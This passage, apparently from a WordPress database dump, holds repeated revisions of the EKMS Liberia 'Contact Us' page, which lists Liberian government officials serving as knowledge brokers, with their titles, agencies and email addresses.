href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Joseph G. Duolupeh BSc, MPSM.</strong><br />Manager, Strategic Planning Unit<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p><p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p><p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Anthony Kullie</strong><br />Director of LHS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Ernest M. Menseah </strong><br />Director of LGS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Wonpue Quellian </strong><br />Research Officer<br />MME<br /><a href=\"mailto:wonpuequellian2017@gmail.com\">wonpuequellian2017@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />Division of Knowledge Management &amp; Archive<br />MOCI<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\n</br>\nManager\n</br>\nDepartment of Marine Fisheries and Environment\n</br>\nNaFAA\n</br>\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p><p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Albert M. Sherman </strong><br />MOT<br /><a href=\"mailto:itssherman@gmail.com\">itssherman@gmail.com</a></p><p><strong>Amos Borbor </strong><br />MOT<br /><a href=\"mailto:felixborbor@gmail.com\">felixborbor@gmail.com</a></p><p><strong>Henry A. Simpson </strong><br />MOT<br /><a href=\"mailto:ransford2024@gmail.com\">ransford2024@gmail.com</a></p><p><strong>James Kollie </strong><br />MOT<br /><a href=\"mailto:jameskollie@yahoo.com\">jameskollie@yahoo.com</a></p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-03-24 11:28:15','2021-03-24 11:28:15','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3624,42,'2021-03-24 11:28:15','2021-03-24 11:28:15','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/konikay-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely BSc, MSc.</strong><br />EIA Manager<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll BSc, MSc.</strong><br />Technical Manager Conservation Department<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Joseph G. Duolupeh BSc, MPSM.</strong><br />Manager, Strategic Planning Unit<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p><p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Anthony Kullie</strong><br />Director of LHS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Ernest M. Menseah </strong><br />Director of LGS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Wonpue Quellian </strong><br />Research Officer<br />MME<br /><a href=\"mailto:wonpuequellian2017@gmail.com\">wonpuequellian2017@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />Division of Knowledge Management &amp; Archive<br />MOCI<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\n</br>\nManager\n</br>\nDepartment of Marine Fisheries and Environment\n</br>\nNaFAA\n</br>\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p><p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Albert M. Sherman </strong><br />MOT<br /><a href=\"mailto:itssherman@gmail.com\">itssherman@gmail.com</a></p><p><strong>Amos Borbor </strong><br />MOT<br /><a href=\"mailto:felixborbor@gmail.com\">felixborbor@gmail.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Henry A. Simpson </strong><br />MOT<br /><a href=\"mailto:ransford2024@gmail.com\">ransford2024@gmail.com</a></p><p><strong>James Kollie </strong><br />MOT<br /><a href=\"mailto:jameskollie@yahoo.com\">jameskollie@yahoo.com</a></p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-03-24 11:28:15','2021-03-24 11:28:15','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3625,42,'2021-03-25 08:43:52','2021-03-25 08:43:52','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/konikay-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely BSc, MSc.</strong><br />EIA Manager<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll BSc, MSc.</strong><br />Technical Manager Conservation Department<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Joseph G. Duolupeh BSc, MPSM.</strong><br />Manager, Strategic Planning Unit<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p><p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Anthony Kullie</strong><br />Director of LHS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Ernest M. Menseah </strong><br />Director of 